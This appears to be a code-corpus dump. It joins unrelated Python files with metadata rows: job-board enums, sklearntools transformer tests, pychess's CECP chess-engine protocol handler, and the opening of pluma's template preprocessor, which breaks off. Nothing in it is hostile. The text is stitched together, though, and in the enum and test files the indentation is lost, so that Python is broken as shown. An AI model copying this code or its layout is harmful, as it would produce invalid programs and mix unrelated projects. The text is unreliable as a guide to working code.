MY = (DRAFT, PENDING, CONFIRMED, REVIEWED, MODERATED, ANNOUNCEMENT, CLOSED)
ARCHIVED = (CONFIRMED, REVIEWED, ANNOUNCEMENT, CLOSED)
class CURRENCY(LabeledEnum):
INR = ('INR', 'INR')
USD = ('USD', 'USD')
EUR = ('EUR', 'EUR')
__order__ = (INR, USD, EUR)
class EMPLOYER_RESPONSE(LabeledEnum):
NEW = (0, u"New") # New application
PENDING = (1, u"Pending") # Employer viewed on website
IGNORED = (2, u"Ignored") # Dismissed as not worth responding to
REPLIED = (3, u"Replied") # Employer replied to candidate
FLAGGED = (4, u"Flagged") # Employer reported a spammer
SPAM = (5, u"Spam") # Admin marked this as spam
REJECTED = (6, u"Rejected") # Employer rejected candidate with a message
class PAY_TYPE(LabeledEnum):
NOCASH = (0, u"Nothing")
ONETIME = (1, u"One-time")
RECURRING = (2, u"Recurring")
class CANDIDATE_FEEDBACK(LabeledEnum):
NORESPONSE = (0, u"No response")
INPROCESS = (1, u"In process")
DID_NOT_GET = (2, u"Did not get the job")
DID_NOT_ACCEPT = (3, u"Got offer, did not accept")
GOT_JOB = (4, u"Got the job")
from .user import *
from .jobcategory import *
from .jobpostreport import *
from .jobtype import *
from .location import *
from .tag import *
from .reportcode import *
from .jobpost import *
from .domain import *
from .board import *
from .flags import *
from .campaign import *
| agpl-3.0 | 6,810,176,725,132,138,000 | 32.628205 | 100 | 0.655738 | false |
jcrudy/sklearntools | sklearntools/test/test_transformers.py | 1 | 3613 | from sklearntools.transformers import Constant, VariableTransformer, Identity,\
Censor, NanMap, Log
import numpy as np
import pandas
from numpy.testing.utils import assert_array_almost_equal
from sklearn.datasets.base import load_boston
from pyearth.earth import Earth
from sklearntools.calibration import ResponseTransformingEstimator
from sklearn.metrics.regression import r2_score
# from sklearntools.sym.printers import exec_module, model_to_code
def test_with_response_transformation():
X, y = load_boston(return_X_y=True)
log_y = np.log(y)
X = pandas.DataFrame(X, columns=['x%d' % i for i in range(X.shape[1])])
y = pandas.DataFrame(y, columns=['y'])
transformer = VariableTransformer(dict(y=Log(Identity('y'))))
model = ResponseTransformingEstimator(Earth(), transformer)
model.fit(X, y)
log_y_pred = model.predict(X)
assert r2_score(log_y, log_y_pred) > .8
assert r2_score(y, log_y_pred) < .1
def test_transformation_system():
np.random.seed(1)
x = Identity('x')
y = Identity('y')
z = Identity('z')
d = (x + y) / z
transformer = VariableTransformer(dict(d=d), exclusive=True)
X = pandas.DataFrame(np.random.normal(size=(10,3)), columns=['x','y','z'])
transformer.fit(X)
assert_array_almost_equal(transformer.transform(X)['d'], (X['x'] + X['y']) / X['z'])
# numpy_test_module = exec_module('numpy_test_module', model_to_code(transformer, 'numpy', 'transform', 'test_model'))
# assert_array_almost_equal(pandas.DataFrame(dict(zip(['x', 'y', 'z', 'd'], numpy_test_module.test_model(**X))))[['x', 'y', 'z', 'd']], transformer.transform(X))
def test_rate():
np.random.seed(1)
X = pandas.DataFrame({'count': np.random.poisson(1., size=100), 'duration': np.random.poisson(5., size=100)})
rate = Censor(Identity('count') / Identity('duration'), Identity('duration') < 4)
transformer = VariableTransformer(dict(rate=rate))
transformer.fit(X)
target = X['count'] / X['duration']
target[X['duration'] < 4] = np.nan
assert_array_almost_equal(transformer.transform(X)['rate'], target)
# numpy_test_module = exec_module('numpy_test_module', model_to_code(transformer, 'numpy', 'transform', 'test_model'))
# assert_array_almost_equal(pandas.DataFrame(dict(zip(['count', 'duration', 'rate'], numpy_test_module.test_model(**X))))[['count', 'duration', 'rate']], transformer.transform(X))
def test_uncensor():
X = pandas.DataFrame(np.random.normal(size=(10,3)), columns=['x','y','z'])
X.loc[1,'x'] = np.nan
X.loc[2, 'y'] = np.nan
transformer = NanMap({'x': 100.})
transformer.fit(X)
X_ = transformer.transform(X)
assert_array_almost_equal(X['y'], X_['y'])
assert not (X['x'] == X_['x']).all()
fix = X['x'].copy()
fix[1] = 100.
assert_array_almost_equal(fix, X_['x'])
def test_non_strict():
X = pandas.DataFrame(np.random.normal(size=(10,3)), columns=['x','y','z'])
X.loc[1,'x'] = np.nan
X.loc[2, 'y'] = np.nan
transformer = NanMap({'x': 100.,
'w': 0.})
transformer.fit(X)
X_ = transformer.transform(X)
assert_array_almost_equal(X['y'], X_['y'])
assert not (X['x'] == X_['x']).all()
fix = X['x'].copy()
fix[1] = 100.
assert_array_almost_equal(fix, X_['x'])
if __name__ == '__main__':
import sys
import nose
# This code will run the test in this file.'
module_name = sys.modules[__name__].__file__
result = nose.run(argv=[sys.argv[0],
module_name,
'-s', '-v'])
| bsd-3-clause | 5,028,816,710,361,895,000 | 38.703297 | 183 | 0.612787 | false |
leogregianin/pychess | lib/pychess/Players/CECPEngine.py | 1 | 39654 |
import asyncio
import itertools
import re
from gi.repository import Gtk, GObject
from pychess.compat import create_task
from pychess.Utils import wait_signal
from pychess.System import conf
from pychess.System.Log import log
from pychess.widgets import mainwindow
from pychess.Utils.Move import Move
from pychess.Utils.Board import Board
from pychess.Utils.Cord import Cord
from pychess.Utils.Move import toSAN, toAN, parseAny
from pychess.Utils.Offer import Offer
from pychess.Utils.const import ANALYZING, INVERSE_ANALYZING, DRAW, WHITEWON, BLACKWON, \
WON_ADJUDICATION, DRAW_OFFER, ACTION_ERROR_NONE_TO_ACCEPT, CASTLE_KK, WHITE, \
CASTLE_SAN, FISCHERRANDOMCHESS, BLACK, reprSign, RESIGNATION
from pychess.Utils.logic import validate, getMoveKillingKing
from pychess.Utils.lutils.ldata import MATE_VALUE
from pychess.Utils.lutils.lmove import ParsingError
from pychess.Variants import variants
from pychess.Players.Player import PlayerIsDead, TurnInterrupt, InvalidMove
from .ProtocolEngine import ProtocolEngine, TIME_OUT_SECOND
movere = re.compile(r"""
( # group start
(?: # non grouping parenthesis start
[PKQRBN]? # piece
[a-h]?[1-8]? # unambiguous column or line
x? # capture
@? # drop
[a-h][1-8] # destination square
=?[QRBN]? # promotion
|O\-O(?:\-O)? # castling
|0\-0(?:\-0)? # castling
) # non grouping parenthesis end
[+#]? # check/mate
) # group end
\s* # any whitespace
""", re.VERBOSE)
d_plus_dot_expr = re.compile(r"\d+\.")
anare = re.compile("""
^ # beginning of string
(\s* #
\d+ [+\-\.]? # The ply analyzed. Some engines end it with a dot, minus or plus
\s+) #
(-?Mat\s*\d+ | [+\-\d\.]+) # The score found in centipawns.
# Mat1 is used by gnuchess to specify mate in one.
# otherwise we should support a signed float
\s+ #
([\d\.]+) # The time used in centi-seconds
\s+ #
([\d\.]+) # Number of nodes visited
\s+ #
(.+) # The Principal-Variation. With or without move numbers
\s* #
$ # end of string
""", re.VERBOSE)
# anare = re.compile("\(d+)\.?\s+ (Mat\d+|[-\d\.]+) \s+ \d+\s+\d+\s+((?:%s\s*)+)" % mov)
whitespaces = re.compile(r"\s+")
# There is no way in the CECP protocol to determine if an engine not answering
# the protover=2 handshake with done=1 is old or just very slow. Thus we
# need a timeout after which we conclude the engine is 'protover=1' and will
# never answer.
# XBoard will only give 2 seconds, but as we are quite sure that
# the engines support the protocol, we can add more. We don't add
# infinite time though, just in case.
# The engine can get more time by sending done=0
class CECPEngine(ProtocolEngine):
def __init__(self, subprocess, color, protover, md5):
ProtocolEngine.__init__(self, subprocess, color, protover, md5)
self.features = {
"ping": 0,
"setboard": 0,
"playother": 0,
"san": 0,
"usermove": 0,
"time": 1,
"draw": 1,
"sigint": 0,
"sigterm": 0,
"reuse": 0,
"analyze": 0,
"myname": ', '.join(self.defname),
"variants": None,
"colors": 1,
"ics": 0,
"name": 0,
"pause": 0,
"nps": 0,
"debug": 0,
"memory": 0,
"smp": 0,
"egt": '',
"option": '',
"exclude": 0,
"done": None,
}
self.supported_features = [
"ping", "setboard", "san", "usermove", "time", "draw", "sigint",
"analyze", "myname", "variants", "colors", "pause", "done", "egt",
"debug", "smp", "memory", "option"
]
self.options = {}
self.options["Ponder"] = {"name": "Ponder",
"type": "check",
"default": False}
self.name = None
self.board = Board(setup=True)
# if self.engineIsInNotPlaying == True, engine is in "force" mode,
# i.e. not thinking or playing, but still verifying move legality
self.engineIsInNotPlaying = False
self.engineIsAnalyzing = False
self.movenext = False
self.waitingForMove = False
self.readyForMoveNowCommand = False
self.timeHandicap = 1
self.lastping = 0
self.lastpong = 0
self.queue = asyncio.Queue()
self.parse_line_task = create_task(self.parseLine(self.engine))
self.died_cid = self.engine.connect("died", lambda e: self.queue.put_nowait("die"))
self.invalid_move = None
self.optionQueue = []
self.undoQueue = []
self.ready_moves_event = asyncio.Event()
self.cids = [
self.connect_after("readyForOptions", self.__onReadyForOptions),
self.connect_after("readyForMoves", self.__onReadyForMoves),
]
# Starting the game
def prestart(self):
print("xboard", file=self.engine)
if self.protover == 1:
# start a new game (CECPv1 engines):
print("new", file=self.engine)
# we are now ready for options:
self.emit("readyForOptions")
elif self.protover == 2:
# start advanced protocol initialisation:
print("protover 2", file=self.engine)
# we don't start a new game for CECPv2 here,
# we will do it after feature accept/reject is completed.
def start(self, event, is_dead):
create_task(self.__startBlocking(event, is_dead))
@asyncio.coroutine
def __startBlocking(self, event, is_dead):
if self.protover == 1:
self.emit("readyForMoves")
return_value = "ready"
if self.protover == 2:
try:
return_value = yield from asyncio.wait_for(self.queue.get(), TIME_OUT_SECOND)
if return_value == "not ready":
return_value = yield from asyncio.wait_for(self.queue.get(), TIME_OUT_SECOND)
# Gaviota sends done=0 after "xboard" and after "protover 2" too
if return_value == "not ready":
return_value = yield from asyncio.wait_for(self.queue.get(), TIME_OUT_SECOND)
self.emit("readyForOptions")
self.emit("readyForMoves")
except asyncio.TimeoutError:
log.warning("Got timeout error", extra={"task": self.defname})
is_dead.add(True)
except Exception:
log.warning("Unknown error", extra={"task": self.defname})
is_dead.add(True)
else:
if return_value == "die":
is_dead.add(True)
assert return_value == "ready" or return_value == "del"
if event is not None:
event.set()
def __onReadyForOptions(self, self_):
# We always want post turned on so the Engine Output sidebar can
# show those things -Jonas Thiem
print("post", file=self.engine)
for command in self.optionQueue:
print(command, file=self.engine)
def __onReadyForMoves(self, self_):
if self.mode in (ANALYZING, INVERSE_ANALYZING):
# workaround for crafty not sending analysis after it has found a mating line
# http://code.google.com/p/pychess/issues/detail?id=515
if "crafty" in self.features["myname"].lower():
print("noise 0", file=self.engine)
self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
self.ready_moves_event.set()
self.readyMoves = True
# Ending the game
def end(self, status, reason):
self.parse_line_task.cancel()
if self.engine.handler_is_connected(self.died_cid):
self.engine.disconnect(self.died_cid)
if self.handler_is_connected(self.analyze_cid):
self.disconnect(self.analyze_cid)
for cid in self.cids:
if self.handler_is_connected(cid):
self.disconnect(cid)
self.board = None
if self.connected:
# We currently can't fillout the comment "field" as the repr strings
# for reasons and statuses lies in Main.py
# Creating Status and Reason class would solve this
if status == DRAW:
print("result 1/2-1/2 {?}", file=self.engine)
elif status == WHITEWON:
print("result 1-0 {?}", file=self.engine)
elif status == BLACKWON:
print("result 0-1 {?}", file=self.engine)
else:
print("result * {?}", file=self.engine)
if reason == WON_ADJUDICATION:
self.queue.put_nowait("invalid")
# Make sure the engine exits and do some cleaning
self.kill(reason)
def kill(self, reason):
""" Kills the engine, starting with the 'quit' command, then sigterm and
eventually sigkill.
Returns the exitcode, or if engine have already been killed, returns
None """
if self.connected:
self.connected = False
try:
try:
print("quit", file=self.engine)
self.queue.put_nowait("del")
self.engine.terminate()
except OSError as err:
# No need to raise on a hang up error, as the engine is dead
# anyways
if err.errno == 32:
log.warning("Hung up Error", extra={"task": self.defname})
return err.errno
else:
raise
finally:
# Clear the analyzed data, if any
self.emit("analyze", [])
# Send the player move updates
def setBoard(self, board, search=True):
def coro():
if self.engineIsAnalyzing:
self.__stop_analyze()
yield from asyncio.sleep(0.1)
self.setBoardList([board], [])
if search:
self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
create_task(coro())
def putMove(self, board1, move, board2):
""" Sends the engine the last move made (for spectator engines).
@param board1: The current board
@param move: The last move made
@param board2: The board before the last move was made
"""
def coro():
if self.engineIsAnalyzing:
self.__stop_analyze()
yield from asyncio.sleep(0.1)
self.setBoardList([board1], [])
if not self.analyzing_paused:
self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
create_task(coro())
@asyncio.coroutine
def makeMove(self, board1, move, board2):
""" Gets a move from the engine (for player engines).
@param board1: The current board
@param move: The last move made
@param board2: The board before the last move was made
@return: The move the engine decided to make
"""
log.debug("makeMove: move=%s self.movenext=%s board1=%s board2=%s self.board=%s" % (
move, self.movenext, board1, board2, self.board), extra={"task": self.defname})
assert self.readyMoves
if self.board == board1 or not board2 or self.movenext:
self.board = board1
self.__tellEngineToPlayCurrentColorAndMakeMove()
self.movenext = False
else:
self.board = board1
self.__usermove(board2, move)
if self.engineIsInNotPlaying:
self.__tellEngineToPlayCurrentColorAndMakeMove()
self.waitingForMove = True
self.readyForMoveNowCommand = True
# Parse outputs
status = yield from self.queue.get()
if status == "not ready":
log.warning(
"Engine seems to be protover=2, but is treated as protover=1",
extra={"task": self.defname})
status = yield from self.queue.get()
if status == "ready":
status = yield from self.queue.get()
if status == "invalid":
raise InvalidMove
if status == "del" or status == "die":
raise PlayerIsDead("Killed by foreign forces")
if status == "int":
raise TurnInterrupt
self.waitingForMove = False
self.readyForMoveNowCommand = False
assert isinstance(status, Move), status
return status
def updateTime(self, secs, opsecs):
if self.features["time"]:
print("time %s" % int(secs * 100 * self.timeHandicap),
file=self.engine)
print("otim %s" % int(opsecs * 100), file=self.engine)
# Standard options
def setOptionAnalyzing(self, mode):
self.mode = mode
def setOptionInitialBoard(self, model):
@asyncio.coroutine
def coro():
yield from self.ready_moves_event.wait()
# We don't use the optionQueue here, as set board prints a whole lot of
# stuff. Instead we just call it.
self.setBoardList(model.boards[:], model.moves[:])
create_task(coro())
def setBoardList(self, boards, moves):
# Notice: If this method is to be called while playing, the engine will
# need 'new' and an arrangement similar to that of 'pause' to avoid
# the current thought move to appear
if self.mode not in (ANALYZING, INVERSE_ANALYZING):
self.__tellEngineToStopPlayingCurrentColor()
self.__setBoard(boards[0])
self.board = boards[-1]
for board, move in zip(boards[:-1], moves):
self.__usermove(board, move)
if self.mode in (ANALYZING, INVERSE_ANALYZING):
self.board = boards[-1]
if self.mode == INVERSE_ANALYZING:
self.board = self.board.switchColor()
# The called of setBoardList will have to repost/analyze the
# analyzer engines at this point.
def setOptionVariant(self, variant):
if self.features["variants"] is None:
log.warning("setOptionVariant: engine doesn't support variants",
extra={"task": self.defname})
return
if variant in variants.values() and not variant.standard_rules:
assert variant.cecp_name in self.features["variants"], \
"%s doesn't support %s variant" % (self, variant.cecp_name)
self.optionQueue.append("variant %s" % variant.cecp_name)
# Strength system #
# Strength Depth Ponder Time handicap #
# 1 1 o 1,258% #
# 2 2 o 1,584% #
# 3 3 o 1.995% #
# #
# 19 o x 79,43% #
# 20 o x o #
def setOptionStrength(self, strength, forcePonderOff):
self.strength = strength
if strength <= 19:
self.__setTimeHandicap(0.01 * 10 ** (strength / 10.))
if strength <= 18:
self.__setDepth(strength)
# Crafty ofers 100 skill levels
if "crafty" in self.features["myname"].lower() and strength <= 19:
self.optionQueue.append("skill %s" % strength * 5)
self.__setPonder(strength >= 19 and not forcePonderOff)
if strength == 20:
if "gaviota" in self.features["egt"]:
self.optionQueue.append("egtpath gaviota %s" % conf.get("egtb_path"))
else:
self.optionQueue.append("random")
def __setDepth(self, depth):
self.optionQueue.append("sd %d" % depth)
def __setTimeHandicap(self, timeHandicap):
self.timeHandicap = timeHandicap
def __setPonder(self, ponder):
if ponder:
self.optionQueue.append("hard")
else:
self.optionQueue.append("hard")
self.optionQueue.append("easy")
def setOptionTime(self, secs, gain, moves):
# Notice: In CECP we apply time handicap in updateTime, not in
# setOptionTime.
minutes = int(secs / 60)
secs = int(secs % 60)
mins = str(minutes)
if secs:
mins += ":" + str(secs)
self.optionQueue.append("level %s %s %d" % (moves, mins, gain))
# Option handling
def setOption(self, key, value):
""" Set an option, which will be sent to the engine, after the
'readyForOptions' signal has passed.
If you want to know the possible options, you should go to
engineDiscoverer or use the hasOption method
while you are in your 'readyForOptions' signal handler """
if self.readyMoves:
log.warning(
"Options set after 'readyok' are not sent to the engine",
extra={"task": self.defname})
if key == "cores":
self.optionQueue.append("cores %s" % value)
elif key == "memory":
self.optionQueue.append("memory %s" % value)
elif key.lower() == "ponder":
self.__setPonder(value == 1)
else:
self.optionQueue.append("option %s=%s" % (key, value))
# Interacting with the player
def pause(self):
""" Pauses engine using the "pause" command if available. Otherwise put
engine in force mode. By the specs the engine shouldn't ponder in
force mode, but some of them do so anyways. """
log.debug("pause: self=%s" % self, extra={"task": self.defname})
if self.isAnalyzing():
self.__stop_analyze()
self.analyzing_paused = True
else:
self.engine.pause()
return
def resume(self):
log.debug("resume: self=%s" % self, extra={"task": self.defname})
if self.isAnalyzing():
self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
self.analyzing_paused = False
else:
self.engine.resume()
return
def hurry(self):
log.debug("hurry: self.waitingForMove=%s self.readyForMoveNowCommand=%s" % (
self.waitingForMove, self.readyForMoveNowCommand), extra={"task": self.defname})
if self.waitingForMove and self.readyForMoveNowCommand:
self.__tellEngineToMoveNow()
self.readyForMoveNowCommand = False
def spectatorUndoMoves(self, moves, gamemodel):
if self.analyzing_paused:
return
log.debug("spectatorUndoMoves: moves=%s gamemodel.ply=%s gamemodel.boards[-1]=%s self.board=%s" % (
moves, gamemodel.ply, gamemodel.boards[-1], self.board), extra={"task": self.defname})
for i in range(moves):
print("undo", file=self.engine)
self.board = gamemodel.boards[-1]
def playerUndoMoves(self, moves, gamemodel):
log.debug("CECPEngine.playerUndoMoves: moves=%s self=%s gamemodel.curplayer=%s" %
(moves, self, gamemodel.curplayer), extra={"task": self.defname})
self.board = gamemodel.boards[-1]
self.__tellEngineToStopPlayingCurrentColor()
for i in range(moves):
print("undo", file=self.engine)
if gamemodel.curplayer != self and moves % 2 == 1 or \
(gamemodel.curplayer == self and moves % 2 == 0):
# Interrupt if we were searching, but should no longer do so
log.debug("CECPEngine.playerUndoMoves: putting TurnInterrupt into self.move_queue %s" % self.name, extra={"task": self.defname})
self.queue.put_nowait("int")
# Offer handling
def offer(self, offer):
if offer.type == DRAW_OFFER:
if self.features["draw"]:
print("draw", file=self.engine)
else:
self.emit("accept", offer)
def offerError(self, offer, error):
if self.features["draw"]:
# We don't keep track if engine draws are offers or accepts. We just
# Always assume they are accepts, and if they are not, we get this
# error and emit offer instead
if offer.type == DRAW_OFFER and error == ACTION_ERROR_NONE_TO_ACCEPT:
self.emit("offer", Offer(DRAW_OFFER))
# Internal
def __usermove(self, board, move):
if self.features["usermove"]:
self.engine.write("usermove ")
if self.features["san"]:
print(toSAN(board, move), file=self.engine)
else:
castle_notation = CASTLE_KK
if board.variant == FISCHERRANDOMCHESS:
castle_notation = CASTLE_SAN
print(
toAN(board,
move,
short=True,
castleNotation=castle_notation),
file=self.engine)
def __tellEngineToMoveNow(self):
if self.features["sigint"]:
self.engine.sigint()
print("?", file=self.engine)
def __tellEngineToStopPlayingCurrentColor(self):
print("force", file=self.engine)
self.engineIsInNotPlaying = True
def __tellEngineToPlayCurrentColorAndMakeMove(self):
self.__printColor()
print("go", file=self.engine)
self.engineIsInNotPlaying = False
def __stop_analyze(self):
if self.engineIsAnalyzing:
print("exit", file=self.engine)
# Some engines (crafty, gnuchess) doesn't respond to exit command
# we try to force them to stop with an empty board fen
print("setboard 8/8/8/8/8/8/8/8 w - - 0 1", file=self.engine)
self.engineIsAnalyzing = False
def __sendAnalyze(self, inverse=False):
if inverse and self.board.board.opIsChecked():
# Many engines don't like positions able to take down enemy
# king. Therefore we just return the "kill king" move
# automaticaly
self.emit("analyze", [(self.board.ply, [toAN(
self.board, getMoveKillingKing(self.board))], MATE_VALUE - 1, "1", "")])
return
print("post", file=self.engine)
print("analyze", file=self.engine)
self.engineIsAnalyzing = True
if not conf.get("infinite_analysis"):
loop = asyncio.get_event_loop()
loop.call_later(conf.get("max_analysis_spin"), self.__stop_analyze)
def __printColor(self):
if self.features["colors"]: # or self.mode == INVERSE_ANALYZING:
if self.board.color == WHITE:
print("white", file=self.engine)
else:
print("black", file=self.engine)
def __setBoard(self, board):
if self.features["setboard"]:
self.__tellEngineToStopPlayingCurrentColor()
fen = board.asFen(enable_bfen=False)
if self.mode == INVERSE_ANALYZING:
fen_arr = fen.split()
if not self.board.board.opIsChecked():
if fen_arr[1] == "b":
fen_arr[1] = "w"
else:
fen_arr[1] = "b"
fen = " ".join(fen_arr)
print("setboard %s" % fen, file=self.engine)
else:
# Kludge to set black to move, avoiding the troublesome and now
# deprecated "black" command. - Equal to the one xboard uses
self.__tellEngineToStopPlayingCurrentColor()
if board.color == BLACK:
print("a2a3", file=self.engine)
print("edit", file=self.engine)
print("#", file=self.engine)
for color in WHITE, BLACK:
for y_loc, row in enumerate(board.data):
for x_loc, piece in row.items():
if not piece or piece.color != color:
continue
sign = reprSign[piece.sign]
cord = repr(Cord(x_loc, y_loc))
print(sign + cord, file=self.engine)
print("c", file=self.engine)
print(".", file=self.engine)
# Parsing
@asyncio.coroutine
def parseLine(self, proc):
while True:
line = yield from wait_signal(proc, 'line')
if not line:
break
else:
line = line[1]
if line[0:1] == "#":
# Debug line which we shall ignore as specified in CECPv2 specs
continue
# log.debug("__parseLine: line=\"%s\"" % line.strip(), extra={"task":self.defname})
parts = whitespaces.split(line.strip())
if parts[0] == "pong":
self.lastpong = int(parts[1])
continue
# Illegal Move
if parts[0].lower().find("illegal") >= 0:
log.warning("__parseLine: illegal move: line=\"%s\", board=%s" % (
line.strip(), self.board), extra={"task": self.defname})
if parts[-2] == "sd" and parts[-1].isdigit():
print("depth", parts[-1], file=self.engine)
continue
# A Move (Perhaps)
if self.board:
if parts[0] == "move":
movestr = parts[1]
# Old Variation
elif d_plus_dot_expr.match(parts[0]) and parts[1] == "...":
movestr = parts[2]
else:
movestr = False
if movestr:
self.waitingForMove = False
self.readyForMoveNowCommand = False
if self.engineIsInNotPlaying:
# If engine was set in pause just before the engine sent its
# move, we ignore it. However the engine has to know that we
# ignored it, and thus we step it one back
log.info("__parseLine: Discarding engine's move: %s" %
movestr,
extra={"task": self.defname})
print("undo", file=self.engine)
continue
else:
try:
move = parseAny(self.board, movestr)
except ParsingError:
self.invalid_move = movestr
log.info(
"__parseLine: ParsingError engine move: %s %s"
% (movestr, self.board),
extra={"task": self.defname})
self.end(WHITEWON if self.board.color == BLACK else
BLACKWON, WON_ADJUDICATION)
continue
if validate(self.board, move):
self.board = None
self.queue.put_nowait(move)
continue
else:
self.invalid_move = movestr
log.info(
"__parseLine: can't validate engine move: %s %s"
% (movestr, self.board),
extra={"task": self.defname})
self.end(WHITEWON if self.board.color == BLACK else
BLACKWON, WON_ADJUDICATION)
continue
# Analyzing
if self.engineIsInNotPlaying:
if parts[:4] == ["0", "0", "0", "0"]:
# Crafty doesn't analyze until it is out of book
print("book off", file=self.engine)
continue
match = anare.match(line)
if match:
depth, score, time, nodes, moves = match.groups()
if "mat" in score.lower() or "#" in moves:
# Will look either like -Mat 3 or Mat3
scoreval = MATE_VALUE
if score.startswith('-'):
scoreval = -scoreval
else:
scoreval = int(score)
nps = str(int(int(nodes) / (int(time) / 100))) if int(time) > 0 else ""
mvstrs = movere.findall(moves)
if mvstrs:
self.emit("analyze", [(self.board.ply, mvstrs, scoreval, depth.strip(), nps)])
continue
# Offers draw
if parts[0:2] == ["offer", "draw"]:
self.emit("accept", Offer(DRAW_OFFER))
continue
# Resigns
if parts[0] == "resign" or \
(parts[0] == "tellics" and parts[1] == "resign"): # buggy crafty
# Previously: if "resign" in parts,
# however, this is too generic, since "hint", "bk",
# "feature option=.." and possibly other, future CECPv2
# commands can validly contain the word "resign" without this
# being an intentional resign offer.
self.emit("offer", Offer(RESIGNATION))
continue
# if parts[0].lower() == "error":
# continue
# Tell User Error
if parts[0] == "tellusererror":
# We don't want to see our stop analyzer hack as an error message
if "8/8/8/8/8/8/8/8" in "".join(parts[1:]):
continue
# Create a non-modal non-blocking message dialog with the error:
dlg = Gtk.MessageDialog(mainwindow(),
flags=0,
type=Gtk.MessageType.WARNING,
buttons=Gtk.ButtonsType.CLOSE,
message_format=None)
# Use the engine name if already known, otherwise the defname:
displayname = self.name
if not displayname:
displayname = self.defname
# Compose the dialog text:
dlg.set_markup(GObject.markup_escape_text(_(
"The engine %s reports an error:") % displayname) + "\n\n" +
GObject.markup_escape_text(" ".join(parts[1:])))
# handle response signal so the "Close" button works:
dlg.connect("response", lambda dlg, x: dlg.destroy())
dlg.show_all()
continue
# Tell Somebody
if parts[0][:4] == "tell" and \
parts[0][4:] in ("others", "all", "ics", "icsnoalias"):
log.info("Ignoring tell %s: %s" %
(parts[0][4:], " ".join(parts[1:])))
continue
if "feature" in parts:
# Some engines send features after done=1, so we will iterate after done=1 too
done1 = False
# We skip parts before 'feature', as some engines give us lines like
# White (1) : feature setboard=1 analyze...e="GNU Chess 5.07" done=1
parts = parts[parts.index("feature"):]
for i, pair in enumerate(parts[1:]):
# As "parts" is split with no thoughs on quotes or double quotes
# we need to do some extra handling.
if pair.find("=") < 0:
continue
key, value = pair.split("=", 1)
if key not in self.features:
continue
if value.startswith('"') and value.endswith('"'):
value = value[1:-1]
# If our pair was unfinished, like myname="GNU, we search the
# rest of the pairs for a quotating mark.
elif value[0] == '"':
rest = value[1:] + " " + " ".join(parts[2 + i:])
j = rest.find('"')
if j == -1:
log.warning("Missing endquotation in %s feature",
extra={"task": self.defname})
value = rest
else:
value = rest[:j]
elif value.isdigit():
value = int(value)
if key in self.supported_features:
print("accepted %s" % key, file=self.engine)
else:
print("rejected %s" % key, file=self.engine)
if key == "done":
if value == 1:
done1 = True
continue
elif value == 0:
log.info("Adds %d seconds timeout" % TIME_OUT_SECOND,
extra={"task": self.defname})
# This'll buy you some more time
self.queue.put_nowait("not ready")
break
if key == "smp" and value == 1:
self.options["cores"] = {"name": "cores",
"type": "spin",
"default": 1,
"min": 1,
"max": 64}
elif key == "memory" and value == 1:
self.options["memory"] = {"name": "memory",
"type": "spin",
"default": 32,
"min": 1,
"max": 4096}
elif key == "option" and key != "done":
option = self.__parse_option(value)
self.options[option["name"]] = option
else:
self.features[key] = value
if key == "myname" and not self.name:
self.setName(value)
if done1:
# Start a new game before using the engine:
# (CECPv2 engines)
print("new", file=self.engine)
# We are now ready for play:
self.emit("readyForOptions")
self.emit("readyForMoves")
self.queue.put_nowait("ready")
# A hack to get better names in protover 1.
# Unfortunately it wont work for now, as we don't read any lines from
# protover 1 engines. When should we stop?
if self.protover == 1:
if self.defname[0] in ''.join(parts):
basis = self.defname[0]
name = ' '.join(itertools.dropwhile(
lambda part: basis not in part, parts))
self.features['myname'] = name
if not self.name:
self.setName(name)
def __parse_option(self, option):
if " -check " in option:
name, value = option.split(" -check ")
return {"type": "check", "name": name, "default": bool(int(value))}
elif " -spin " in option:
name, value = option.split(" -spin ")
defv, minv, maxv = value.split()
return {"type": "spin",
"name": name,
"default": int(defv),
"min": int(minv),
"max": int(maxv)}
elif " -slider " in option:
name, value = option.split(" -slider ")
defv, minv, maxv = value.split()
return {"type": "spin",
"name": name,
"default": int(defv),
"min": int(minv),
"max": int(maxv)}
elif " -string " in option:
name, value = option.split(" -string ")
return {"type": "text", "name": name, "default": value}
elif " -file " in option:
name, value = option.split(" -file ")
return {"type": "text", "name": name, "default": value}
elif " -path " in option:
name, value = option.split(" -path ")
return {"type": "text", "name": name, "default": value}
elif " -combo " in option:
name, value = option.split(" -combo ")
choices = list(map(str.strip, value.split("///")))
default = ""
for choice in choices:
if choice.startswith("*"):
index = choices.index(choice)
default = choice[1:]
choices[index] = default
break
return {"type": "combo",
"name": name,
"default": default,
"choices": choices}
elif " -button" in option:
pos = option.find(" -button")
return {"type": "button", "name": option[:pos]}
elif " -save" in option:
pos = option.find(" -save")
return {"type": "button", "name": option[:pos]}
elif " -reset" in option:
pos = option.find(" -reset")
return {"type": "button", "name": option[:pos]}
# Info
def canAnalyze(self):
assert self.ready, "Still waiting for done=1"
return self.features["analyze"]
def getAnalysisLines(self):
return 1
def minAnalysisLines(self):
return 1
def maxAnalysisLines(self):
return 1
def requestMultiPV(self, setting):
return 1
def __repr__(self):
if self.name:
return self.name
return self.features["myname"]
| gpl-3.0 | 7,185,567,614,037,482,000 | 39.054545 | 140 | 0.489459 | false |
mate-desktop/pluma | tools/preprocessor.py | 1 | 5353 | # -*- coding: utf-8 -*-
# preprocessor.py - simple preprocessor for plugin template files
# This file is part of pluma
#
# Copyright (C) 2006 - Steve Frécinaux
# Copyright (C) 2012-2021 MATE Developers
#
# pluma is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pluma is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pluma; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA
import sys
import re
class DeepnessException(Exception):
def __init__(self):
Exception.__init__(self)
statements = [re.compile("^##\s*%s\s*$" % pattern) for pattern in
['(?P<stmt>ifdef|ifndef)\s+(?P<key>[^\s]+)',
'(?P<stmt>elif|if)\s+(?P<expr>.+)',
'(?P<stmt>else|endif)',
'(?P<stmt>define)\s+(?P<key>[^\s]+)(\s+(?P<val>.+))?',
'(?P<stmt>undef)\s+(?P<key>[^\s]+)']]
